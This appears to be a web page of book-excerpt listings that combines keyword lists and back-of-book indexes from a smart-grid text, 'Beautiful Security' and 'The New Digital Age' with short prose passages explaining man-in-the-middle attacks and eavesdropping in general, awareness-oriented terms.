business cycle, business process, carbon footprint, clean water, cloud computing, data acquisition, decarbonisation, demand response, distributed generation, electricity market, energy security, exponential backoff, factory automation, Ford Model T, green new deal, green transition, information retrieval, information security, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Iridium satellite, iterative process, knowledge economy, life extension, linear programming, low earth orbit, machine readable, market design, MITM: man-in-the-middle, off grid, oil shale / tar sands, OSI model, packet switching, performance metric, RFC: Request For Comment, RFID, smart cities, smart grid, smart meter, smart transportation, Thomas Davenport

. • Eavesdropping: The goal of the attacker is to violate the confidentiality of the communication, for example, by sniffing packets on the local area network (LAN) or by intercepting wireless transmissions. • Man-in-the-middle attack: In a man-in-the-middle attack, the attacker acts toward both end points of the communication as if the attacker was the expected, legitimate partner. In addition to confidentiality violations, this also allows modifying the exchanged messages (integrity). Via man-in-the-middle attacks, weaknesses in the implementation or usage of certain key exchange and authentication protocols can be exploited to gain control even over encrypted sessions. • Virus: A virus-based attack manipulates a legitimate user to bypass authentication and access control mechanisms in order to execute the malicious code injected by the attacker.

Index 460 Complementarities, 364, 371–373, 375 Component Interface Specification (CIS), 98, 101 Compressed Air Energy Storage (CAES), 146, 148 Concentrating Solar Power (CSP), 35, 44 Conceptual Reference Model (CRM), 339 Confidentiality, 301, 318, 342 Conventional backup capacity, 367, 368, 370, 373, 375, 384, 387 Co-production, 64 Counter (CTR), 307, 309 Control Center API (CCAPI), 97 Cybersecurity, 16, 18, 19, 342 Cyclic Redundancy Check (CRC), 310 Data Attribute (DA), 85 Data concentrator, 189 Data Link Layer (DLL), 303 Data Object (DO), 85 Decarbonizing scenarios, 357 Demand Response (DR), 183, 184, 259, 293 Demand Response and Load Control (DRLC), 187 Demand Response and Smart Grid Coalition (DRSG), 13 Denial of Service (DoS) attack, 301 Data Encryption Standard (DES), 312 Device Language Message Specification (DLMS), 191 Digital Subscriber Line (DSL), 266 Direct combustion, 68 Direct Load Control (DLC), 184 DISPOWER, 22, 159 Distributed Denial of Service (DDoS) attack, 301 Distributed Energy Resources (DERs), 145, 154, 248 Distributed power generation, 37 Distribution grid management, 344 Distribution Management System (DMS), 79 Eavesdropping, 301 ECHONET, 184, 224 EDGE, 287 EDISON, 25, 169 Electric Storage (ES), 145, 184, 187, 242 Electric Storage-Distributed Energy Resource (ES-DER), 151 Electric transportation, 342 Electric Vehicle (EV), 145, 184 Electric Vehicle Batteries (EVB), 164 Electric Vehicles (EV), 145 EMIX (Energy Market Information Exchange) 1.0, 187 Energy capacity, 364–370, 372, 375 Energy density, 164, 166 Energy dumping, 354, 364, 366, 369, 370, 384, 390 Energy Management System Application Program Interface (EMS-API), 98, 99 Energy Management Systems (EMS), 149, 186 Energy Service Interface (ESI), 149, 186, 208, 215 Energy storage, 379, 381, 382, 389 Energy-to-weight ratio, 164 Enhanced Geothermal System (EGS), 64 EtherCAT, 303, 324 Ethernet, 82, 84, 115 Ethernet powerlink, 303 EUC, 319 EU-DEEP, 159 EUI-64, 304, 309 European Committee for Electrotechnical Standardization (CENELEC), 8 European Committee for Standardization (CEN), 8 European Installation Bus (EIB), 235 EV-DO, 288 Fast DR, 184 Feeder Terminal Unit (FTU), 126 Fiber-to-the-home FTTH, 266 Framework Programme (FP), 159 Index Fuel cell, 56, 59, 60 Function set, 215 G3-PLC, 251, 262 G4V, 179 Gasification, 68 Generic Object Oriented Substation Event (GOOSE), 82 Generic Substation Event (GSE), 84 GEO satellite systems, 291 Geo-pressured, 64 Geothermal energy, 60, 63, 64 Geothermal ground, 64 Global smart grid federation, 14 GPRS, 287 Grid flexibility, 362, 364, 366, 387 Grid integration, 352, 374, 381 Grid to Vehicle (G2V), 146, 166 GridWise alliance (USA), 14 GridWise Architecture Council (GWAC), 12 Global System for Mobile Communication (GSM), 254, 272, 286, 287 Hidden terminal problem, 279 Highly elliptical orbit, 291 Home Area Network (HAN), 189, 214 Home Electronic System (HES), 184, 198 Home Energy Management System (HEMS), 227 Homegrid Forum (HGF), 12 HomePlug, 262 HomePlug AV HomePlug AV2, 263 Homeplug powerline alliance, 11 Highn speed packet access HSPA+, 286 Hypertext Transfer Protocol (HTTP), 105 Human Machine Interface (HMI), 84 Hybrid Electric Vehicles (HEVs), 163 Hydroelectric power, 37, 38, 40 Hydroelectric Pumped Storage (HPS), 146 Hydrogen, 59 Hydrogen fuel cell, 59 Hydropower, 35, 37 461 Hydropower plants, 38 Hydropower standards, 40 Hydrothermal, 64 IEC 60834, 106 IEC 60870, 88, 126 IEC 61508, 319 IEC 61850, 82 IEC 61968, 102 IEC 61970, 97, 125, 126 IEC 62351, 316 IEC 61784–3, 302 IEC SC65C/WG12, 301 IEDs, 82 IEEE 802.11, 254 IEEE 802.15.4, 304, 309 IEEE 802.22, 283 IETF, 312 iGREENGrid, 159 Internet Inter-ORB Protocol (IIOP), 105 IMT-advanced, 289, 290 India smart grid forum (India), 14 Information Exchange Model (IEM), 105 INSTEON, 235, 238 Institute of Electrical and Electronics Engineers (IEEE), 7 Integrity, 314, 318, 321, 342 Interchangeability, 330 Inter-control center communications protocol, 93 Interface Reference Model (IRM), 103 Intermittent renewable sources, 410 Internal Combustion Engines (ICE), 161 International Atomic Time (TAI), 309 International Electrotechnical Commission (IEC), 4 Telecontrol Application Service Element 2 (TASE.2), 93 International Energy Agency (IEA), 12 International Organization for Standardization (ISO), 6 International Telecommunication Union (ITU), 7 Internet Engineering Task Force (IETF), 2 Internet protocol, 257 Index 462 Interoperability, 248 IPsec, 213 IRED, 159 ISA100.11a, 278 ISO 9506, 95 ISO/OSI, 87 NB-PLC, 259 Near field communication, 274 Netricity, 251 Network energy capacity, 367, 368 Network Layer (NL), 303 Non-repudiation, 318 Japan smart community alliance, 14 Object Identification System (OBIS), 192 ONE-NET, 238 OPC UA, 324 OpenHAN 2.0, 217 Open V2G, 179 Operational policy, 372, 373 Optical fiber networks, 264 Organization for the Advancement of Structured Information Standards (OASIS), 11 Out-Of-Band (OOB), 304 KNX, 261 LEO satellite system, 291 Local Area Networks (LANs), 82 Logic Device (LD), 85 Logic Node (LN), 85 LONMARK, 234 LONTALK, 233 LONWORKS, 233 LTE Long term evolution, 289 Machine-to-machine M2M, 269 MACsec, 311 Man-in-the-middle attack, 301 Manufacturing Message Specification (MMS), 82 Master Data Telegram (MDT), 313 MERGE, 179 Meter Data Management System (MDMS), 189 MHR, 309 MIC, 305, 307 MICROGRIDS, 159 MMIC, 322 MOLECULES, 179 Molten Carbonate Fuel Cell (MCFC), 155 Multimode, 264 Passive optical networks, 252 Payload Data Unit (PDU), 307 Phase Change Materials (PCMs), 150 Photovoltaic (PV), 35 PKI, 319 Plug-in Electric Vehicle (PEV), 177, 187 Plug-in Hybrid Electric Vehicles (PHEVs), 147 Power capacity, 364–366, 369, 372 Power control center, 80 Power grid, 79 Power line communication, 263 Power-to-weight ratio, 164 PRIME, 261 Process layer, 84 PROFIBUS/PROFINET, 311 PROFIsafe, 302 Proton Exchange Membrane Fuel Cell (PEMFC), 155 Pumped Hydro Storage (PHS), 146, 147 Narrowband PLC, 251, 260 National Electrical Manufactures Association (NEMA), 11 National Institute of Standards and Technology (NIST), 7, 264 Radio frequency identification RFID, 270 Range anxiety, 161 Registration Process (RP), 221 RPL, 258, 259, 283 Index Safety integrity level, 322 Sampled Measured Values (SMV), 82 Sampling value (SV), 85 Satellite communication, 291 SCL, 111, 112 SDH, 265 Single-mode, 264, 265 Slow DR, 184 Smart Energy Profile (SEP) 2.0, 187 Smart Grid Interoperability Panel (SGIP), 14 Smart home and building automation, 183, 197 Society of Automotive Engineers (SAE) international, 7 Solar energy, 40 Solid Oxide Fuel Cell (SOFC), 155 SONET, 265 Specific Communication Service Mapping (SCSM), 84 Storage design and dispatch, 366 Storage usefulness, 365 Substation, 84–85 Substation layer, 84 Superconducting Magnetic Energy Storage (SMES), 147 Supervisory Control and Data Acquisition (SCADA), 80 SWITCH, 357 Symmetric channel model (BSC), 111 System Interface Exchange Descriptions (SIED), 128 TCP/IP, 79 Technical Committee 57 (TC57), 82 Telecommunications Industry Association (TIA), 8 Thermal Energy Storage (TES), 150 Time stamp, 310 UCA International Users Group (UCAIug), 10 Ultra capacitors, 150 UMTS, 288 463 Unified Modeling Language (UML), 174 United States Advanced Battery Consortium (USABC), 164 Unlicensed spectrum, 275, 283 Variability, 354, 356, 372, 375 Vehicle-to-Grid (V2G), 170 Very high penetration, 384 Virtual Consecutive Number (VCN), 316 Virtual End Node (VEN), 187 Virtual Power Plant (VPP), 145 Virtual Private Network (VPN), 318 Virtual Top Node (VTN), 189 Virus, 318 VSAT Very small aperture terminal, 292 WAVE2M, 258 WCDMA Wideband CDMA, 288 Weightless, 283 Wide Area Networks (WANs), 205 Wide Area situational awareness, 341 Wi-Fi, 9 Wi-Fi alliance, 9 WiMAX 10 IEEE 802.16, 290 Wind energy, 51, 54 Wind turbine, 52 Wired communication, 321, 322 Wireless standards, 268 Wireless technologies, 270 WirelessHART, 278 Worldwide Interoperability for Microwave Access (wimax) forum, 10 X10, 235, 239 XML, 128 ZigBee, 277 ZigBee alliance, 10 ZigBee Home Automation (ZHA), 228 Z-Wave, 221, 224, 333 WILEY END USER LICENSE AGREEMENT Go to www.wiley.com/go/eula to access Wiley’s ebook EULA.


pages: 302 words: 82,233

Beautiful security by Andy Oram, John Viega

Albert Einstein, Amazon Web Services, An Inconvenient Truth, Bletchley Park, business intelligence, business process, call centre, cloud computing, corporate governance, credit crunch, crowdsourcing, defense in depth, do well by doing good, Donald Davies, en.wikipedia.org, fault tolerance, Firefox, information security, loose coupling, Marc Andreessen, market design, MITM: man-in-the-middle, Monroe Doctrine, new economy, Nicholas Carr, Nick Leeson, Norbert Wiener, operational security, optical character recognition, packet switching, peer-to-peer, performance metric, pirate software, Robert Bork, Search for Extraterrestrial Intelligence, security theater, SETI@home, Silicon Valley, Skype, software as a service, SQL injection, statistical model, Steven Levy, the long tail, The Wisdom of Crowds, Upton Sinclair, web application, web of trust, zero day, Zimmermann PGP

The warning popped up because any traffic being encrypted was actually being decrypted at my laptop, not at the final destination as the user assumes. In other words, they’re running a secure, encrypted connection just as they want—except the encryption is using my certificate and I can trivially decrypt the data again. As the man in the middle, I can decrypt users’ data, record everything, and then reencrypt it and pass it along to its final destination. I could record usernames, passwords, email messages, and other potentially confidential information that the victim assumed was being passed securely to a trusted destination. Even a small slice of your personal networking traffic can open a chink for serious identity attacks.

Instead they have felt their way through the process and have just enough knowledge to pay their bills online and check their stock portfolio. Something like a digital certificate makes about as much sense to them as a proton accelerator. On the other hand, I find technically savvy people who have a comprehensive understanding not only of digital certificates but also of man-in-the-middle attacks. One might think these people would never fall for such a scam, but on the contrary, I have found that even these people are quick to fall victim. The reason is that—unlike my parents, who don’t understand anything—the experts understand it so well that they rationalize what is taking place.

Brazos, 206 Gutmann, Peter, 117 H handshakes, 28 Hannaford Brothers security breach, 67, 68, 211 hash algorithms data translucency and, 241 LAN Manager, 4 SET procedure, 78 INDEX 273 Windows NT, 5 Hasselbacher, Kyle, 127 health care field infosecurity and, 208 security metrics, 34–38 Health Insurance Portability and Accountability Act (HIPAA), 80, 214 hierarchical trust cumulative trust comparison, 110 defined, 109 HijackThis change tracker, 92 HIPAA (Health Insurance Portability and Accountability Act), 80, 214 HIPS (Host-based Intrusion Prevention Systems), 253 Holz, Thorsten, 145 Homeland Security, Department of, 36 honeyclients defined, 133 future of, 146 implementation limitations, 143 open source, 133–135 operational results, 139–140 operational steps, 134, 137 related work, 144–145 second-generation, 135–138 storing and correlating data, 140 honeymonkeys, 144 Honeynet Project, 138, 145 honeypot systems defined, 133 proliferation of malware, 252 Honeywall, 138 host logging, 232–237 Host-based Intrusion Prevention Systems (HIPS), 253 hostile environments confirmation traps and, 10 specialization in, 249 hotspot services, 22 House Committee on Homeland Security, 201 Howard, Michael, 195 HTTPS protocol, 66 Hubbard, Dan, 144 Hula Direct ad broker, 98, 99 I IBM, social networking and, 159 IDEA (International Data Encryption Algorithm), 117, 118 iDefense Labs, 59, 156 identity certificates, 111 identity management services, 154 identity theft devaluing credit card information, 71 274 INDEX wireless networking, 23–25 IDS (intrusion detection system) building a resilient model, 233–237 challenges detecting botnets, 231 false positives, 217 functionality, 226 honeyclient support, 133, 144 host logging, 232–237 host-based, 253 improving detection with context, 228–231 limitations, 227, 229 log handling considerations, 218 Iframedollars.biz, 132 incident detection, 233 (see also malicious attacks) building a resilient model, 233–237 host logging and, 232–237 improving with context, 228–231 percentage identified, 226, 227 SQL Slammer worm, 225 InCtrl change tracker, 92 information dealers defined, 64 IRC data exchange, 67 malware producers and, 64 sources of information, 68 information security as long tail market, 165–167 balance in, 202–207 basic concepts, 200 cloud computing, 150–154 communication considerations, 207–211 connecting people and processes, 154–158 doing the right thing, 211–212 historical review, 248–251 host logging, 232 need for new strategies, 247 organizational culture, 200–202 overview, 147–150 September 11, 2001 and, 249 social networking and, 158–162 strict scrutiny, 252–254 suggested practices, 257 supercrunching, 153, 162–164 taking a security history, 44–46 web services, 150–154 Information Security Economics, 162–164 Information Security Group, 168 injected iFrames, 69 International Data Encryption Algorithm (IDEA), 117, 118 International Tariff on Arms Regulations (ITAR), 3 Internet Explorer exploit-based installs and, 92 open source honeyclients, 134 recent vulnerabilities, 131 Internet Relay Chat (see IRC) intranets, security flaws, 25 introducers in PGP, 113 (see also certificate authorities) defined, 109, 112 extended, 123 Web of Trust process, 113 intrusion detection system (see IDS) investment metrics, 47 IRC (Internet Relay Chat) botnet communication, 66 cyber underground communication, 65, 67 ISO 2700x standard, 214 ISPs, costs versus profits, 16–17 ITAR (International Tariff on Arms Regulations), 3 ITIL regulation, 214 iTunes, 165 J J/Secure, 76 JCB International, 76 Jericho Forum, 156 Jerusalem virus, 248 K Kaminsky, Dan, 161 KBA (knowledge-based authentication), 68 key loggers as information source, 68 specialization in, 249 key signatures bloat and harassment, 124 certificate support, 111 exportable, 125 freshness considerations, 122 in-certificate preferences, 126 Web of Trust, 113, 115, 120 keyrings, 112 keys (see certificates; public key cryptography) keyservers defined, 112 key-editing policies, 126 PGP Global Directory, 127 Klez virus, 248 knowledge-based authentication (KBA), 68 Kovah, Xeno, 138 L L0phtCrack government interest in, 13 learned helplessness example, 3–6 Lai, Xuejia, 117 LAN Manager, 4 Lancaster, Branko, 117 Langevin, Jim, 201 LANs, physical security inherent in, 28 Lansky, Jared, 90–92 learned helplessness backward compatibility and, 2 defined, 2, 7 L0phtCrack example, 3–6 overview, 2–7 Leeson, Nick, 38–49 legacy systems backward compatibility, 7 e-commerce security and, 74 end-of-life upgrades, 2, 7 password security and, 4–6 legal considerations balance in information security, 202–207 communication and information security, 207– 211 doing the right thing, 211–212 information security concepts, 200 log handling, 223 organizational culture, 200–202 value of logs, 214 Levy, Steven, 119 LinkShare affiliate network, 102 Linux systems, 221 log management tools, 222–223 log messages, 215 logs case study, 218–221 challenges with, 216–218 classifying, 214 database, 221 defined, 215 email tracking, 221 future possibilities, 221–223 host logging, 232–237 incident detection and, 226, 228 regulatory compliance and, 214 universal standard considerations, 217 usefulness of, 153, 214, 215 long straddle trading strategy, 40 Lucent (see Bell Labs) Lynch, Aidan, 144 M machine learning, 254 malicious attacks, 228 (see also cyber underground; incident detection) attack indicators, 233–237 Blaster, 248 INDEX 275 Code Red, 248 confirmation traps, 10 directionality of, 227 energy companies vulnerabilities, 18 identity theft, 22–28 Jerusalem, 248 Klez, 248 Melissa, 248 Michelangelo, 248 Morris, 248 MyDoom, 248 Nimda, 248 Pakistani Flu, 248 Slammer, 248 Snort signatures, 228 Sober, 248 Sobig, 248 SQL Slammer worm, 225–227, 229 Symantec reports on, 229 VBS/Loveletter—“I Love you”, 248 W32.Gaobot worm, 229 malvertisements, 92–94 malware anti-virus software and, 251 as cyber attack method, 69 banking trojans, 141, 249 client-side exploitation, 15, 132, 141–143 common distribution methods, 69 current market values, 67 directionality of attacks, 227 gaming trojans, 141, 249 historical review, 248–249 polymorphic, 70 production cycle, 64 streamlining identification of, 254 targeted advertising, 250 testing, 65 zero-day exploits, 252 malware producers defined, 64 information dealers and, 64 polymorphic malware, 70 testing code, 65 man-in-the-middle attacks, 25 manual penetration testing, 190 Massey, James, 117 MasterCard 3-D Secure protocol, 76 SET protocol, 78 Maurer, Ueli, 128 MBNA, 79 McAfee online safety survey, 187 SiteAdvisor, 97 vulnerability management, 152 276 INDEX McBurnett, Neal, 128 McCabe, Jim, 178, 179 McCaul, Mike, 201 McDougle, John, 178 McGraw, Gary, 186 McManus, John, 171–182 Mean Time Between Security Incidents (MTBSI), 48 Mean Time to Repair (MTTR), 58 Mean Time to Repair Security Incidents (MTTRSI), 48 Media Guard product, 94 medical field infosecurity and, 208 security metrics, 34–38 Melissa virus, 248 Merchant Server Plug-in (MPI), 77 meta-introducers, 123 metrician, 34 metrics Barings Bank security breach, 38–49 coverage, 46 for data responsibility, 72 health care field, 34–38 investment, 47 measuring ROI, 163 scan coverage, 58 software development lifecycle and, 172–174, 189 TJX security breach, 49–59 treatment effect, 48 MetricsCenter technology, 45 MetricsCenter.org, 54 Michelangelo virus, 248 microchunking, 166 Microsoft, 134 (see also Internet Explorer) Authenticode, 110 Azure cloud operating system, 152 Commission on Cyber Security, 201 CPC advertising, 100 hierarchical trust, 110 honeymonkeys, 144 L0phtCrack example, 3–6 security controls in SDLC, 194 SQL Server, 225 supporting legacy systems, 7 testing approach, 10 Unix systems and, 8 MITRE Corporation, 135, 222 money, 44, 70, 141 (see also financial institutions; PCI) Monroe Doctrine, 201 Morris virus, 248 mothership systems, 230 Motorola Corporation, 31 Mozilla Firefox honeyclient support, 140, 145 malware exploits and, 141 MPI (Merchant Server Plug-in), 77 MTBSI (Mean Time Between Security Incidents), 48 MTTR (Mean Time to Repair), 58 MTTRSI (Mean Time to Repair Security Incidents), 48 Murray, Daragh, 144 MyDoom virus, 248 MySpace social network, 159 N naïveté client counterpart of, 8–9 learned helplessness and, 2–7 NASA background, 171 perception of closed systems, 172 software development lifecycle, 172–174, 178– 181 National Institute for Standards, 159 National Office for Cyberspace (NOC), 201, 202 Nazario, Jose, 145 newsgroups, 250 Nichols, Elizabeth, 33–61 Nichols, Elizabeth A., 30 Nimda virus, 248 NOC (National Office for Cyberspace), 201, 202 NTLM authentication, 6 O OCC, 191 off-the-shelf software (see software acquisition) Office Max, 50 online advertising advertisers as victims, 98–105 attacks on users, 89–98 CPA advertising, 102–103 CPC advertising, 100–101 CPM advertising, 100–103 creating accountability, 105 deceptive ads, 94–98 exploit-laden banner ads, 89–92 false impressions, 98–99 fighting fraud, 103–104 malvertisements, 92–94 special procurement challenges, 104 targeted, 250 online advertising, targeted, 249 online forums, 250 Open Security Foundation, 55 open source honeyclients, 133–135 Open Web Application Security Project (see OWASP) OpenID identity management, 154 OpenPGP standard/protocol background, 108 certification support, 111, 112 designated revokers, 122 direct trust, 109 exportable signatures, 125 extended introducers, 123 in-certificate preferences, 126 key support, 112 key-editing policies, 126 revoking certificates, 122 OpenSocial API, 159 operating systems, host logging, 232, 236 OptOut spyware removal tool, 251 Orange Book, 213 organizational culture, 200–202 outsourcing extending security initiative to, 190 trends in, 154 vulnerability research, 156 OWASP (Open Web Application Security Project) background, 159 CLASP methodology, 187 Top 10 list, 187 P P2P (peer-to-peer) networks botnet communication, 66 honeyclient considerations, 146 packet sniffers, 92 packets handshake, 28 SQL Slammer worm, 227 Pakistani Flu virus, 248 PAN (Primary Account Number), 77 Panda Labs, 69 PAR (Payer Authentication Request), 77 PARAM tag, 94 passive sniffing, 9 passphrases, 29 password grinding, 28 password-cracking tools L0phtCrack example, 3–6 passphrases and, 29 passwords authentication security, 7 identity theft and, 24 NTLM authentication and, 6 PATHSERVER, 129 Payer Authentication Request (PAR), 77 Payment Card Industry (see PCI) INDEX 277 PayPal, 79 PCI (Payment Card Industry) Data Security Standard, 75, 82, 159, 211, 214, 237 protecting credit card data, 44 peer-to-peer networks (see P2P networks) PEM (Privacy Enhanced Mail), 117 perma-vendors, 156 Personally Identifiable Information (PII), 180 Pezzonavante honeyclient, 144 PGP (Pretty Good Privacy), 111 (see also Web of Trust) background, 107, 108, 116 backward compatibility issues, 117 Crypto Wars, 118 designated revokers, 122 encryption support, 107, 116–120 key validity, 108 patent and export problems, 117 source download, 116 trust models, 109–116 trust relationships, 108 PGP Corporation, 108 PGP Global Directory, 127 pharmware, 68 phishing 3-D Secure protocol, 77 as information source, 68 botnet support, 66 challenges detecting, 231 spam and, 70 specialization in, 249 PhoneyC website, 145 PII (Personally Identifiable Information), 180 Piper, Fred, 168 PKI (Public Key Infrastructure) authoritative keys, 123 defined, 111 DSG support, 203 revoking certificates, 120 SET considerations, 79 PlexLogic, 45 Plumb, Colin, 119 port scanning, 231 pragmatic security, 200, 209 Pre-Shared Key (PSK), 28 Pretty Good Privacy (see PGP) Price, Will, 127 Primary Account Number (PAN), 77 Privacy Enhanced Mail (PEM), 117 proof-of-concept project, 191–193 Provos, Niels, 145 PSK (Pre-Shared Key), 28 psychological traps confirmation traps, 10–14 278 INDEX functional fixation, 14–20 learned helplessness, 2 public key cryptography cumulative trust systems, 111 key revocation, 121 PGP support, 107 RSA algorithm, 117 SET support, 78 steganographic applications, 245 validity, 108 Public Key Infrastructure (see PKI) Public Key Partners, 118 put options, 39 Q Qualys vulnerability management, 151 R Raduege, Harry, 201 Regular, Bob, 90 regulatory compliance (see legal considerations) Reiter, Mark, 129 Reliable Software Technologies, 171, 173 reputation economy, 167 resource dealers, 64 Return on Investment (ROI), 163, 205–207 Return on Security Investment (ROSI), 206 Returnil, 254, 255, 256, 257 revoking certificates, 120–122 RFC 1991, 108, 119 RFC 3156, 108 RFC 4880, 108 Right Media, 94 ROI (Return on Investment), 163, 205–207 root certificates defined, 109 direct trust, 110 rootkits example investigating, 220 Rustock.C, 252 specialization in, 249 ROSI (Return on Security Investment), 206 routers DDoS attacks on, 16 host logging, 232 watch lists, 231 Routh, Jim, 183–197 RSA Data Security Incorporated, 117 RSA public-key algorithm, 117 RSAREF library, 117 Rustock.C rootkit, 252 S Sabett, Randy V., 199–212 sandboxing functionality, 254 HIPS support, 253 need for new strategies, 248 Santa Fe Group, 44 Sarbanes-Oxley Act (SOX), 80, 214 SCADA systems, 18 Schoen, Seth, 127 SDLC (see software development lifecycle) Second Life virtual world, 159 Secret Service Shadowcrew network and, 65 TJX security breach and, 50 Secunia, 156 Secure Electronic Transaction (see SET) security breaches attorney involvement in investigating, 211 Barings Bank, 38–49 California data privacy law, 203–205 cyber underground and, 63–72 databases and, 239 impact of, 208 logs in investigating, 218–221 public data sources, 59 tiger team responses, 210–211 TJX, 49–59 security certificates defined, 22 encryption and, 22, 24 fundamental flaw, 25 paying attention to, 26 wireless access points, 26, 27 Security Event Managers (SEMs), 153 security metrics (see metrics) Security Metrics Catalog project, 54 security traps (see psychological traps) SecurityFocus database, 132 SecurityMetrics.org, 54 SEI (Software Engineering Institute), 176 Seifert, Christian, 138, 145 self-signed certificates, 109 SEMs (Security Event Managers), 153 separation of duties, 39 September 11, 2001, 249 server applications, host logging, 232 Service Set Identifier (SSID), 52 service-oriented architecture (SOA), 150 SET (Secure Electronic Transaction) background, 78 evaluation of, 79 protections supported, 78 transaction process, 79 SHA256 hash algorithm, 241 Shadowcrew network, 65 short straddle trading strategy, 39, 40 signature harassment, 125 Sinclair, Upton, 149 Skinner, B.


pages: 525 words: 116,295

The New Digital Age: Transforming Nations, Businesses, and Our Lives by Eric Schmidt, Jared Cohen

access to a mobile phone, additive manufacturing, airport security, Amazon Mechanical Turk, Amazon Web Services, Andy Carvin, Andy Rubin, anti-communist, augmented reality, Ayatollah Khomeini, barriers to entry, bitcoin, borderless world, call centre, Chelsea Manning, citizen journalism, clean water, cloud computing, crowdsourcing, data acquisition, Dean Kamen, disinformation, driverless car, drone strike, Elon Musk, Evgeny Morozov, failed state, false flag, fear of failure, Filter Bubble, Google Earth, Google Glasses, Hacker Conference 1984, hive mind, income inequality, information security, information trail, invention of the printing press, job automation, John Markoff, Julian Assange, Khan Academy, Kickstarter, knowledge economy, Law of Accelerating Returns, market fundamentalism, Mary Meeker, means of production, military-industrial complex, MITM: man-in-the-middle, mobile money, mutually assured destruction, Naomi Klein, Nelson Mandela, no-fly zone, off-the-grid, offshore financial centre, Parag Khanna, peer-to-peer, peer-to-peer lending, personalized medicine, Peter Singer: altruism, power law, Ray Kurzweil, RFID, Robert Bork, self-driving car, sentiment analysis, Silicon Valley, Skype, Snapchat, social graph, speech recognition, Steve Jobs, Steven Pinker, Stewart Brand, Stuxnet, Susan Wojcicki, The Wisdom of Crowds, upwardly mobile, Whole Earth Catalog, WikiLeaks, young professional, zero day

Users assume they are safe, but unless the exchange is encrypted, anyone with access to intermediate parts of the network can listen in. For instance, the owner of a Wi-Fi hot spot can listen to any unencrypted conversations of users connected to the hot spot. One of the most insidious forms of cyber attack that P2P users can encounter is known as a “man-in-the-middle” attack, a form of active eavesdropping. In this situation a third-party attacker inserts himself between two participants in a conversation and automatically relays messages between them, without either participant realizing it. This third party acts like an invisible intermediary, having tricked each participant into believing that the attacker is actually the other party of the conversation.

This third party acts like an invisible intermediary, having tricked each participant into believing that the attacker is actually the other party of the conversation. So as the conversation occurs (whether through text, voice or video), that third-party attacker can sit back and watch, occasionally siphoning off information and storing it elsewhere. (Or, more maliciously, the attacker could insert false information into the conversation.) Man-in-the-middle attacks occur in all protocols, not just peer-to-peer, yet they seem all the more malicious in P2P communications simply because people using those platforms believe they are secure. And even the protection that encryption offers isn’t a sure bet, especially given some of the checks that will still exist in the physical realm.

Libya, 4.1, 4.2, 4.3, 6.1, 7.1, 7.2 life expectancy Lindhout, Amanda LinkedIn Link Egypt litigation lobbying groups Lockhart, Clare, n Lockheed Martin Lord’s Resistance Army loyalties, 2.1, 2.2 LulzSec Maasai, 1.1, nts.1 McAfee, John McChrystal, Stanley Malaysia, 3.1, 4.1, 6.1n Mali, 2.1, 7.1 malware state-initiated, 2.1, 2.2 Mandela, Nelson “man-in-the-middle” attacks Manning, Bradley Mao Zedong MasterCard, 5.1, 5.2 Mauritania, 3.1, 3.2 Mbeki, Thabo MCI Mechanical Turk media: disaggregated mainstream media cycles medicine Megaupload Mehr, 95 memory prosthetics Mexico, 2.1, 5.1, 6.1 microblogs microphones Microsoft, 1.1, 3.1, 3.2 Middle East military-industrial complex Milošević, Slobodan mine-resistant, ambush-protected (MRAP) vehicles Ministry of Posts and Telecommunications, North Korea minority groups, 6.1, con.1 Minority Report (film), 1.1 misinformation, 3.1, 3.2, 6.1 MIT Media Lab Mitnick, Kevin, n Mobile Giving Foundation “mobile health” revolution mobile money credits mobile phones, 1.1, 4.1, 5.1, 5.2, 5.3, 7.1, 7.2, con.1 banned in Iraq in Congo education and health and see also smart phones Money for Good report, nts.1 Mongolia Monopoly (film), 4.1 monuments Moore’s Law, itr.1, con.1 moral sense Moro Islamic Liberation Front Morsi, Mohamed Motorola MTC-Vodafone Mubarak, Hosni, 3.1, 3.2, 4.1, 4.2, 4.3, 7.1 Mugabe, Robert multilayer backup systems Mumbai attacks Mundie, Craig, 3.1, 3.2, 3.3 Muslim Brotherhood, 4.1, 4.2, 4.3 Mutua, Anthony myths names, 2.1, nts.1 Napster narco-terrorists, 5.1, 5.2 nasal implants Natanz nuclear enrichment facility National Security Agency (NSA) National Security Law National Transitional Council (NTC) NATO, 3.1, 4.1, 5.1, 6.1, 6.2, 6.3 Navalny, Alexei Navy SEAL Team Six, 5.1, 5.2 Nawaz, Maajid near-permanent data storage Neda video, 6.1, 6.2 Netflix Netherlands net neutrality Nevada New York City subway, n New York Times, 33, 3.1, 3.2, 4.1, 5.1, 7.1 New York Times Magazine, 197 NGO Ratings Nigeria Nightmare Nixon, Richard noise Nokia Siemens Networks (NSN) nongovernmental organizations (NGOs), 1.1, 2.1, 2.2, 3.1, 6.1, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, con.1, nts.1 nonprofits non-state actors, coping strategies for privacy and security concerns Noor Group, n North Korea, 2.1, 3.1, 3.2, 3.3 Northrop Grumman Norway Nuclear Nonproliferation Treaty Obama, Barack, 3.1, 3.2, 6.1 unauthorized leaks and official profiles Ohio State University Olympic Games (attack code name) One World Trust online cadastral systems online reputations active management of black markets in insurance for open networks open-source movement open-source software, 6.1, 7.1 Operation Avenge Assange optimism options Orascom, 3.1, 3.2 Otpor Ottoman empire, 6.1, 7.1 outsourcing oversights OxOmar PackBot Pakistan, 3.1, 3.2, 4.1, 5.1, 5.2, 5.3, 5.4, 6.1 Palestinian Islamic Jihad paparazzi Paraguay parents Parrot passwords, 2.1, 2.2 patents PayPal, 5.1, 5.2 peer-to-peer (P2P) networking, 2.1, 4.1, nts.1 Philanthropedia philanthropic organizations Philippines, 3.1, 4.1 photographs photonics photos physical infrastructure Picciolini, Christian Pinker, Steven piracy (online) Pirate Bay, 2.1, 3.1 pirates Plataforma México Poland, 4.1, 7.1 police police brutality police cars popular uprisings pornography postcrisis societies, 3.1, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10 poverty power, centralization of power grids Powers, Jonathan power vacuums precision geo-location Predator drones predictive analytics Presidential Records Act privacy, itr.1, 2.1, 2.2, 2.3 in autocracies company policy on, 2.1, 2.2 litigation and in schools security vs., itr.1, 5.1, 5.2 private telecommunications companies processors productivity, 1.1, 1.2 Project Glass property rights Proteus Digital Health proxy servers Psy, n PTSD Pul-e-Charkhi prison Putin, Vladimir Qatar quality of life, 1.1, 1.2 Queen Boat, n racism radio frequency identification (RFID) chips Raytheon real-time collective editing Reaper drones reconstruction connectivity and, 7.1, 7.2 of telecommunications Red Cross, 7.1, 7.2 refugee camps REM cycle remote warfare Renesys, n renrou sousuo yinqing, 197 Reporters 